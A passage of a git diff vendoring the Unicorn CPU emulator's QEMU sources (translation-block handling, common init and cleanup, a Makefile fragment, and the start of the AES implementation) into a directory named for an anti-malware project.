+ that the modification is after the current PC, but it + would require a specialized function to partially + restore the CPU state */ + + current_tb_modified = 1; + cpu_restore_state_from_tb(cpu, current_tb, pc); + cpu_get_tb_cpu_state(env, ¤t_pc, ¤t_cs_base, + ¤t_flags); + } +#endif /* TARGET_HAS_PRECISE_SMC */ + tb_phys_invalidate(uc, tb, addr); + tb = tb->page_next[n]; + } + p->first_tb = NULL; +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb_modified) { + /* we generate a block containing just the instruction + modifying the memory. It will ensure that it cannot modify + itself */ + cpu->current_tb = NULL; + tb_gen_code(cpu, current_pc, current_cs_base, current_flags, 1); + if (locked) { + mmap_unlock(); + } + cpu_resume_from_signal(cpu, puc); + } +#endif +} +#endif + +/* add the tb in the target page and protect it if necessary */ +static inline void tb_alloc_page(struct uc_struct *uc, TranslationBlock *tb, + unsigned int n, tb_page_addr_t page_addr) +{ + PageDesc *p; +#ifndef CONFIG_USER_ONLY + bool page_already_protected; +#endif + + tb->page_addr[n] = page_addr; + p = page_find_alloc(uc, page_addr >> TARGET_PAGE_BITS, 1); + tb->page_next[n] = p->first_tb; +#ifndef CONFIG_USER_ONLY + page_already_protected = p->first_tb != NULL; +#endif + p->first_tb = (TranslationBlock *)((uintptr_t)tb | n); + invalidate_page_bitmap(p); + +#if defined(TARGET_HAS_SMC) || 1 + +#if defined(CONFIG_USER_ONLY) + if (p->flags & PAGE_WRITE) { + target_ulong addr; + PageDesc *p2; + int prot; + + /* force the host page as non writable (writes will have a + page fault + mprotect overhead) */ + page_addr &= qemu_host_page_mask; + prot = 0; + for (addr = page_addr; addr < page_addr + qemu_host_page_size; + addr += TARGET_PAGE_SIZE) { + + p2 = page_find(addr >> TARGET_PAGE_BITS); + if (!p2) { + continue; + } + prot |= p2->flags; + p2->flags &= ~PAGE_WRITE; + } + mprotect(g2h(page_addr), qemu_host_page_size, + (prot & PAGE_BITS) & ~PAGE_WRITE); +#ifdef DEBUG_TB_INVALIDATE + printf("protecting code page: 0x" TARGET_FMT_lx "\n", + page_addr); +#endif + } +#else + /* if some code is already present, then the pages are already + protected. So we handle the case where only the first TB is + allocated in a physical page */ + if (!page_already_protected) { + tlb_protect_code(uc, page_addr); + } +#endif + +#endif /* TARGET_HAS_SMC */ +} + +void tb_invalidate_phys_page_fast(struct uc_struct* uc, tb_page_addr_t start, int len) +{ + PageDesc *p; + +#if 0 + if (1) { + qemu_log("modifying code at 0x%x size=%d EIP=%x PC=%08x\n", + cpu_single_env->mem_io_vaddr, len, + cpu_single_env->eip, + cpu_single_env->eip + + (intptr_t)cpu_single_env->segs[R_CS].base); + } +#endif + p = page_find(uc, start >> TARGET_PAGE_BITS); + if (!p) { + return; + } + if (p->code_bitmap) { + unsigned int nr; + unsigned long b; + + nr = start & ~TARGET_PAGE_MASK; + b = p->code_bitmap[BIT_WORD(nr)] >> ((nr & (BITS_PER_LONG - 1)) & 0x1f); + if (b & ((1 << len) - 1)) { + goto do_invalidate; + } + } else { + do_invalidate: + tb_invalidate_phys_page_range(uc, start, start + len, 1); + } +} + +/* add a new TB and link it to the physical page tables. phys_page2 is + (-1) to indicate that only one page contains the TB. */ +static void tb_link_page(struct uc_struct *uc, + TranslationBlock *tb, tb_page_addr_t phys_pc, tb_page_addr_t phys_page2) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + unsigned int h; + TranslationBlock **ptb; + + /* Grab the mmap lock to stop another thread invalidating this TB + before we are done. */ + mmap_lock(); + /* add in the physical hash table */ + h = tb_phys_hash_func(phys_pc); + ptb = &tcg_ctx->tb_ctx.tb_phys_hash[h]; + tb->phys_hash_next = *ptb; + *ptb = tb; + + /* add in the page list */ + tb_alloc_page(uc, tb, 0, phys_pc & TARGET_PAGE_MASK); + if (phys_page2 != -1) { + tb_alloc_page(uc, tb, 1, phys_page2); + } else { + tb->page_addr[1] = -1; + } + + tb->jmp_first = (TranslationBlock *)((uintptr_t)tb | 2); + tb->jmp_next[0] = NULL; + tb->jmp_next[1] = NULL; + + /* init original jump addresses */ + if (tb->tb_next_offset[0] != 0xffff) { + tb_reset_jump(tb, 0); + } + if (tb->tb_next_offset[1] != 0xffff) { + tb_reset_jump(tb, 1); + } + +#ifdef DEBUG_TB_CHECK + tb_page_check(); +#endif + mmap_unlock(); +} + +/* find the TB 'tb' such that tb[0].tc_ptr <= tc_ptr < + tb[1].tc_ptr. Return NULL if not found */ +static TranslationBlock *tb_find_pc(struct uc_struct *uc, uintptr_t tc_ptr) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + int m_min, m_max, m; + uintptr_t v; + TranslationBlock *tb; + + if (tcg_ctx->tb_ctx.nb_tbs <= 0) { + return NULL; + } + if (tc_ptr < (uintptr_t)tcg_ctx->code_gen_buffer || + tc_ptr >= (uintptr_t)tcg_ctx->code_gen_ptr) { + return NULL; + } + /* binary search (cf Knuth) */ + m_min = 0; + m_max = tcg_ctx->tb_ctx.nb_tbs - 1; + while (m_min <= m_max) { + m = (m_min + m_max) >> 1; + tb = &tcg_ctx->tb_ctx.tbs[m]; + v = (uintptr_t)tb->tc_ptr; + if (v == tc_ptr) { + return tb; + } else if (tc_ptr < v) { + m_max = m - 1; + } else { + m_min = m + 1; + } + } + return &tcg_ctx->tb_ctx.tbs[m_max]; +} + +#if defined(TARGET_HAS_ICE) && !defined(CONFIG_USER_ONLY) +void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr) +{ + ram_addr_t ram_addr; + MemoryRegion *mr; + hwaddr l = 1; + + mr = address_space_translate(as, addr, &addr, &l, false); + if (!(memory_region_is_ram(mr) + || memory_region_is_romd(mr))) { + return; + } + ram_addr = (ram_addr_t)((memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK) + + addr); + tb_invalidate_phys_page_range(as->uc, ram_addr, ram_addr + 1, 0); +} +#endif /* TARGET_HAS_ICE && !defined(CONFIG_USER_ONLY) */ + +void tb_check_watchpoint(CPUState *cpu) +{ + TranslationBlock *tb; + CPUArchState *env = cpu->env_ptr; + + tb = tb_find_pc(env->uc, cpu->mem_io_pc); + if (!tb) { + cpu_abort(cpu, "check_watchpoint: could not find TB for pc=%p", + (void *)cpu->mem_io_pc); + } + cpu_restore_state_from_tb(cpu, tb, cpu->mem_io_pc); + tb_phys_invalidate(cpu->uc, tb, -1); +} + +#ifndef CONFIG_USER_ONLY +/* mask must never be zero, except for A20 change call */ +static void tcg_handle_interrupt(CPUState *cpu, int mask) +{ + cpu->interrupt_request |= mask; + + cpu->tcg_exit_req = 1; +} + +CPUInterruptHandler cpu_interrupt_handler = tcg_handle_interrupt; + +/* in deterministic execution mode, instructions doing device I/Os + must be at the end of the TB */ +void cpu_io_recompile(CPUState *cpu, uintptr_t retaddr) +{ + CPUArchState *env = cpu->env_ptr; + TranslationBlock *tb; + uint32_t n, cflags; + target_ulong pc, cs_base; + uint64_t flags; + + tb = tb_find_pc(env->uc, retaddr); + if (!tb) { + cpu_abort(cpu, "cpu_io_recompile: could not find TB for pc=%p", + (void *)retaddr); + } + n = cpu->icount_decr.u16.low + tb->icount; + cpu_restore_state_from_tb(cpu, tb, retaddr); + /* Calculate how many instructions had been executed before the fault + occurred. */ + n = n - cpu->icount_decr.u16.low; + /* Generate a new TB ending on the I/O insn. */ + n++; + /* On MIPS and SH, delay slot instructions can only be restarted if + they were already the first instruction in the TB. If this is not + the first instruction in a TB then re-execute the preceding + branch. */ +#if defined(TARGET_MIPS) + if ((env->hflags & MIPS_HFLAG_BMASK) != 0 && n > 1) { + env->active_tc.PC -= 4; + cpu->icount_decr.u16.low++; + env->hflags &= ~MIPS_HFLAG_BMASK; + } +#elif defined(TARGET_SH4) + if ((env->flags & ((DELAY_SLOT | DELAY_SLOT_CONDITIONAL))) != 0 + && n > 1) { + env->pc -= 2; + cpu->icount_decr.u16.low++; + env->flags &= ~(DELAY_SLOT | DELAY_SLOT_CONDITIONAL); + } +#endif + /* This should never happen. */ + if (n > CF_COUNT_MASK) { + cpu_abort(cpu, "TB too big during recompile"); + } + + cflags = n | CF_LAST_IO; + pc = tb->pc; + cs_base = tb->cs_base; + flags = tb->flags; + tb_phys_invalidate(cpu->uc, tb, -1); + /* FIXME: In theory this could raise an exception. In practice + we have already translated the block once so it's probably ok. */ + tb_gen_code(cpu, pc, cs_base, (int)flags, cflags); + /* TODO: If env->pc != tb->pc (i.e. the faulting instruction was not + the first in the TB) then we end up generating a whole new TB and + repeating the fault, which is horribly inefficient. + Better would be to execute just this insn uncached, or generate a + second new TB. */ + cpu_resume_from_signal(cpu, NULL); +} + +void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr) +{ + unsigned int i; + + /* Discard jump cache entries for any tb which might potentially + overlap the flushed page. */ + i = tb_jmp_cache_hash_page(addr - TARGET_PAGE_SIZE); + memset(&cpu->tb_jmp_cache[i], 0, + TB_JMP_PAGE_SIZE * sizeof(TranslationBlock *)); + + i = tb_jmp_cache_hash_page(addr); + memset(&cpu->tb_jmp_cache[i], 0, + TB_JMP_PAGE_SIZE * sizeof(TranslationBlock *)); +} + +#if 0 +void dump_exec_info(FILE *f, fprintf_function cpu_fprintf) +{ + int i, target_code_size, max_target_code_size; + int direct_jmp_count, direct_jmp2_count, cross_page; + TranslationBlock *tb; + + target_code_size = 0; + max_target_code_size = 0; + cross_page = 0; + direct_jmp_count = 0; + direct_jmp2_count = 0; + for (i = 0; i < tcg_ctx.tb_ctx.nb_tbs; i++) { + tb = &tcg_ctx.tb_ctx.tbs[i]; + target_code_size += tb->size; + if (tb->size > max_target_code_size) { + max_target_code_size = tb->size; + } + if (tb->page_addr[1] != -1) { + cross_page++; + } + if (tb->tb_next_offset[0] != 0xffff) { + direct_jmp_count++; + if (tb->tb_next_offset[1] != 0xffff) { + direct_jmp2_count++; + } + } + } + /* XXX: avoid using doubles ? */ + cpu_fprintf(f, "Translation buffer state:\n"); + cpu_fprintf(f, "gen code size %td/%zd\n", + tcg_ctx.code_gen_ptr - tcg_ctx.code_gen_buffer, + tcg_ctx.code_gen_buffer_max_size); + cpu_fprintf(f, "TB count %d/%d\n", + tcg_ctx.tb_ctx.nb_tbs, tcg_ctx.code_gen_max_blocks); + cpu_fprintf(f, "TB avg target size %d max=%d bytes\n", + tcg_ctx.tb_ctx.nb_tbs ? target_code_size / + tcg_ctx.tb_ctx.nb_tbs : 0, + max_target_code_size); + cpu_fprintf(f, "TB avg host size %td bytes (expansion ratio: %0.1f)\n", + tcg_ctx.tb_ctx.nb_tbs ? (tcg_ctx.code_gen_ptr - + tcg_ctx.code_gen_buffer) / + tcg_ctx.tb_ctx.nb_tbs : 0, + target_code_size ? (double) (tcg_ctx.code_gen_ptr - + tcg_ctx.code_gen_buffer) / + target_code_size : 0); + cpu_fprintf(f, "cross page TB count %d (%d%%)\n", cross_page, + tcg_ctx.tb_ctx.nb_tbs ? (cross_page * 100) / + tcg_ctx.tb_ctx.nb_tbs : 0); + cpu_fprintf(f, "direct jump count %d (%d%%) (2 jumps=%d %d%%)\n", + direct_jmp_count, + tcg_ctx.tb_ctx.nb_tbs ? (direct_jmp_count * 100) / + tcg_ctx.tb_ctx.nb_tbs : 0, + direct_jmp2_count, + tcg_ctx.tb_ctx.nb_tbs ? (direct_jmp2_count * 100) / + tcg_ctx.tb_ctx.nb_tbs : 0); + cpu_fprintf(f, "\nStatistics:\n"); + cpu_fprintf(f, "TB flush count %d\n", tcg_ctx.tb_ctx.tb_flush_count); + cpu_fprintf(f, "TB invalidate count %d\n", + tcg_ctx.tb_ctx.tb_phys_invalidate_count); + //cpu_fprintf(f, "TLB flush count %d\n", tlb_flush_count); + tcg_dump_info(f, cpu_fprintf); +} +#endif + +#else /* CONFIG_USER_ONLY */ + +void cpu_interrupt(CPUState *cpu, int mask) +{ + cpu->interrupt_request |= mask; + cpu->tcg_exit_req = 1; +} + +#if 0 +/* + * Walks guest process memory "regions" one by one + * and calls callback function 'fn' for each region. + */ +struct walk_memory_regions_data { + walk_memory_regions_fn fn; + void *priv; + target_ulong start; + int prot; +}; + +static int walk_memory_regions_end(struct walk_memory_regions_data *data, + target_ulong end, int new_prot) +{ + if (data->start != -1u) { + int rc = data->fn(data->priv, data->start, end, data->prot); + if (rc != 0) { + return rc; + } + } + + data->start = (new_prot ? end : -1u); + data->prot = new_prot; + + return 0; +} + +static int walk_memory_regions_1(struct walk_memory_regions_data *data, + target_ulong base, int level, void **lp) +{ + target_ulong pa; + int i, rc; + + if (*lp == NULL) { + return walk_memory_regions_end(data, base, 0); + } + + if (level == 0) { + PageDesc *pd = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + int prot = pd[i].flags; + + pa = base | (i << TARGET_PAGE_BITS); + if (prot != data->prot) { + rc = walk_memory_regions_end(data, pa, prot); + if (rc != 0) { + return rc; + } + } + } + } else { + void **pp = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + pa = base | ((target_ulong)i << + (TARGET_PAGE_BITS + V_L2_BITS * level)); + rc = walk_memory_regions_1(data, pa, level - 1, pp + i); + if (rc != 0) { + return rc; + } + } + } + + return 0; +} + +typedef int (*walk_memory_regions_fn)(void *, target_ulong, + target_ulong, unsigned long); + +static int walk_memory_regions(void *priv, walk_memory_regions_fn fn) +{ + struct walk_memory_regions_data data; + uintptr_t i; + + data.fn = fn; + data.priv = priv; + data.start = -1u; + data.prot = 0; + + for (i = 0; i < V_L1_SIZE; i++) { + int rc = walk_memory_regions_1(&data, (target_ulong)i << (V_L1_SHIFT + TARGET_PAGE_BITS), + V_L1_SHIFT / V_L2_BITS - 1, l1_map + i); + if (rc != 0) { + return rc; + } + } + + return walk_memory_regions_end(&data, 0, 0); +} + +static int dump_region(void *priv, target_ulong start, + target_ulong end, unsigned long prot) +{ + FILE *f = (FILE *)priv; + + (void) fprintf(f, TARGET_FMT_lx"-"TARGET_FMT_lx + " "TARGET_FMT_lx" %c%c%c\n", + start, end, end - start, + ((prot & PAGE_READ) ? 'r' : '-'), + ((prot & PAGE_WRITE) ? 'w' : '-'), + ((prot & PAGE_EXEC) ? 'x' : '-')); + + return 0; +} + +/* dump memory mappings */ +void page_dump(FILE *f) +{ + const int length = sizeof(target_ulong) * 2; + (void) fprintf(f, "%-*s %-*s %-*s %s\n", + length, "start", length, "end", length, "size", "prot"); + walk_memory_regions(f, dump_region); +} + +#endif + +int page_get_flags(target_ulong address) +{ + PageDesc *p; + + p = page_find(address >> TARGET_PAGE_BITS); + if (!p) { + return 0; + } + return p->flags; +} + +/* Modify the flags of a page and invalidate the code if necessary. + The flag PAGE_WRITE_ORG is positioned automatically depending + on PAGE_WRITE. The mmap_lock should already be held. */ +static void page_set_flags(struct uc_struct *uc, target_ulong start, target_ulong end, int flags) +{ + target_ulong addr, len; + + /* This function should never be called with addresses outside the + guest address space. If this assert fires, it probably indicates + a missing call to h2g_valid. */ +#if TARGET_ABI_BITS > L1_MAP_ADDR_SPACE_BITS + assert(end < ((target_ulong)1 << L1_MAP_ADDR_SPACE_BITS)); +#endif + assert(start < end); + + start = start & TARGET_PAGE_MASK; + end = TARGET_PAGE_ALIGN(end); + + if (flags & PAGE_WRITE) { + flags |= PAGE_WRITE_ORG; + } + + for (addr = start, len = end - start; + len != 0; + len -= TARGET_PAGE_SIZE, addr += TARGET_PAGE_SIZE) { + PageDesc *p = page_find_alloc(uc, addr >> TARGET_PAGE_BITS, 1); + + /* If the write protection bit is set, then we invalidate + the code inside. */ + if (!(p->flags & PAGE_WRITE) && + (flags & PAGE_WRITE) && + p->first_tb) { + tb_invalidate_phys_page(addr, 0, NULL, false); + } + p->flags = flags; + } +} + +static int page_check_range(target_ulong start, target_ulong len, int flags) +{ + PageDesc *p; + target_ulong end; + target_ulong addr; + + /* This function should never be called with addresses outside the + guest address space. If this assert fires, it probably indicates + a missing call to h2g_valid. */ +#if TARGET_ABI_BITS > L1_MAP_ADDR_SPACE_BITS + assert(start < ((target_ulong)1 << L1_MAP_ADDR_SPACE_BITS)); +#endif + + if (len == 0) { + return 0; + } + if (start + len - 1 < start) { + /* We've wrapped around. */ + return -1; + } + + /* must do before we loose bits in the next step */ + end = TARGET_PAGE_ALIGN(start + len); + start = start & TARGET_PAGE_MASK; + + for (addr = start, len = end - start; + len != 0; + len -= TARGET_PAGE_SIZE, addr += TARGET_PAGE_SIZE) { + p = page_find(addr >> TARGET_PAGE_BITS); + if (!p) { + return -1; + } + if (!(p->flags & PAGE_VALID)) { + return -1; + } + + if ((flags & PAGE_READ) && !(p->flags & PAGE_READ)) { + return -1; + } + if (flags & PAGE_WRITE) { + if (!(p->flags & PAGE_WRITE_ORG)) { + return -1; + } + /* unprotect the page if it was put read-only because it + contains translated code */ + if (!(p->flags & PAGE_WRITE)) { + if (!page_unprotect(addr, 0, NULL)) { + return -1; + } + } + } + } + return 0; +} + +/* called from signal handler: invalidate the code and unprotect the + page. Return TRUE if the fault was successfully handled. */ +static int page_unprotect(target_ulong address, uintptr_t pc, void *puc) +{ + unsigned int prot; + PageDesc *p; + target_ulong host_start, host_end, addr; + + /* Technically this isn't safe inside a signal handler. However we + know this only ever happens in a synchronous SEGV handler, so in + practice it seems to be ok. */ + mmap_lock(); + + p = page_find(address >> TARGET_PAGE_BITS); + if (!p) { + mmap_unlock(); + return 0; + } + + /* if the page was really writable, then we change its + protection back to writable */ + if ((p->flags & PAGE_WRITE_ORG) && !(p->flags & PAGE_WRITE)) { + host_start = address & qemu_host_page_mask; + host_end = host_start + qemu_host_page_size; + + prot = 0; + for (addr = host_start ; addr < host_end ; addr += TARGET_PAGE_SIZE) { + p = page_find(addr >> TARGET_PAGE_BITS); + p->flags |= PAGE_WRITE; + prot |= p->flags; + + /* and since the content will be modified, we must invalidate + the corresponding translated code. */ + tb_invalidate_phys_page(addr, pc, puc, true); +#ifdef DEBUG_TB_CHECK + tb_invalidate_check(addr); +#endif + } + mprotect((void *)g2h(host_start), qemu_host_page_size, + prot & PAGE_BITS); + + mmap_unlock(); + return 1; + } + mmap_unlock(); + return 0; +} +#endif /* CONFIG_USER_ONLY */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.h b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.h new file mode 100644 index 0000000..8216ad8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.h @@ -0,0 +1,28 @@ +/* + * Translated block handling + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#ifndef TRANSLATE_ALL_H +#define TRANSLATE_ALL_H + +/* translate-all.c */ +void cpu_unlink_tb(CPUState *cpu); +void tb_check_watchpoint(CPUState *cpu); +void tb_invalidate_phys_page_fast(struct uc_struct* uc, tb_page_addr_t start, int len); +void tb_cleanup(struct uc_struct *uc); + +#endif /* TRANSLATE_ALL_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/unicorn_common.h b/ai_anti_malware/unicorn/unicorn-master/qemu/unicorn_common.h new file mode 100644 index 0000000..2117c62 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/unicorn_common.h @@ -0,0 +1,91 @@ +#ifndef UNICORN_COMMON_H_ +#define UNICORN_COMMON_H_ + +#include "tcg.h" + +// This header define common patterns/codes that will be included in all arch-sepcific +// codes for unicorns purposes. + +// return true on success, false on failure +static inline bool cpu_physical_mem_read(AddressSpace *as, hwaddr addr, + uint8_t *buf, int len) +{ + return !cpu_physical_memory_rw(as, addr, (void *)buf, len, 0); +} + +static inline bool cpu_physical_mem_write(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len) +{ + return !cpu_physical_memory_rw(as, addr, (void *)buf, len, 1); +} + +void tb_cleanup(struct uc_struct *uc); +void free_code_gen_buffer(struct uc_struct *uc); + +/** Freeing common resources */ +static void release_common(void *t) +{ + TCGPool *po, *to; + TCGContext *s = (TCGContext *)t; +#if TCG_TARGET_REG_BITS == 32 + int i; +#endif + + // Clean TCG. + TCGOpDef* def = &s->tcg_op_defs[0]; + g_free(def->args_ct); + g_free(def->sorted_args); + g_free(s->tcg_op_defs); + + for (po = s->pool_first; po; po = to) { + to = po->next; + g_free(po); + } + tcg_pool_reset(s); + g_hash_table_destroy(s->helpers); + + // TODO(danghvu): these function is not available outside qemu + // so we keep them here instead of outside uc_close. + phys_mem_clean(s->uc); + address_space_destroy(&(s->uc->as)); + memory_free(s->uc); + tb_cleanup(s->uc); + free_code_gen_buffer(s->uc); + cpu_watchpoint_remove_all(CPU(s->uc->cpu), BP_CPU); + cpu_breakpoint_remove_all(CPU(s->uc->cpu), BP_CPU); + +#if TCG_TARGET_REG_BITS == 32 + for(i = 0; i < s->nb_globals; i++) { + TCGTemp *ts = &s->temps[i]; + if (ts->base_type == TCG_TYPE_I64) { + if (ts->name && ((strcmp(ts->name+(strlen(ts->name)-2), "_0") == 0) || + (strcmp(ts->name+(strlen(ts->name)-2), "_1") == 0))) { + free((void *)ts->name); + } + } + } +#endif +} + +static inline void uc_common_init(struct uc_struct* uc) +{ + memory_register_types(uc); + uc->write_mem = cpu_physical_mem_write; + uc->read_mem = cpu_physical_mem_read; + uc->tcg_enabled = tcg_enabled; + uc->tcg_exec_init = tcg_exec_init; + uc->cpu_exec_init_all = cpu_exec_init_all; + uc->vm_start = vm_start; + uc->memory_map = memory_map; + uc->memory_map_ptr = memory_map_ptr; + uc->memory_unmap = memory_unmap; + uc->readonly_mem = memory_region_set_readonly; + + uc->target_page_size = TARGET_PAGE_SIZE; + uc->target_page_align = TARGET_PAGE_SIZE - 1; + + if (!uc->release) + uc->release = release_common; +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/util/Makefile.objs new file mode 100644 index 0000000..874cee1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/Makefile.objs @@ -0,0 +1,10 @@ +util-obj-y = cutils.o qemu-timer-common.o +util-obj-$(CONFIG_WIN32) += oslib-win32.o qemu-thread-win32.o +util-obj-$(CONFIG_POSIX) += oslib-posix.o qemu-thread-posix.o +util-obj-y += module.o +util-obj-y += bitmap.o bitops.o +util-obj-y += error.o +util-obj-y += aes.o +util-obj-y += crc32c.o +util-obj-y += host-utils.o +util-obj-y += getauxval.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/aes.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/aes.c new file mode 100644 index 0000000..50c69c3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/aes.c @@ -0,0 +1,1059 @@ +/** + * + * aes.c - integrated in QEMU by Fabrice Bellard from the OpenSSL project. + */ +/* + * rijndael-alg-fst.c + * + * @version 3.0 (December 2000) + * + * Optimised ANSI C code for the Rijndael cipher (now AES) + * + * @author Vincent Rijmen + * @author Antoon Bosselaers + * @author Paulo Barreto + * + * This code is hereby placed in the public domain. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS + * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR + * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, + * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE + * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, + * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +#include "qemu-common.h" +#include "qemu/aes.h" + +typedef uint32_t u32; +typedef uint8_t u8; + +/* This controls loop-unrolling in aes_core.c */ +#undef FULL_UNROLL +# define GETU32(pt) (((u32)(pt)[0] << 24) ^ ((u32)(pt)[1] << 16) ^ ((u32)(pt)[2] << 8) ^ ((u32)(pt)[3])) +# define PUTU32(ct, st) { (ct)[0] = (u8)((st) >> 24); (ct)[1] = (u8)((st) >> 16); (ct)[2] = (u8)((st) >> 8); (ct)[3] = (u8)(st); } + +const uint8_t AES_sbox[256] = { + 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, + 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, + 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, + 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, + 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, + 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, + 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, + 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, + 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, + 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, + 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, + 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, + 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, + 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, + 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, + 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, + 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, + 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, + 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, + 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, + 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, + 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, + 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, + 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, + 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, + 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, + 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, + 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, + 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, + 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, + 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, + 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, +}; + +const uint8_t AES_isbox[256] = { + 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, + 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, + 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, + 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, + 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, + 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, + 0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, + 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, + 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, + 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, + 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, + 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, + 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, + 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, + 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, + 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, + 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, + 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, + 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, + 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, + 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, + 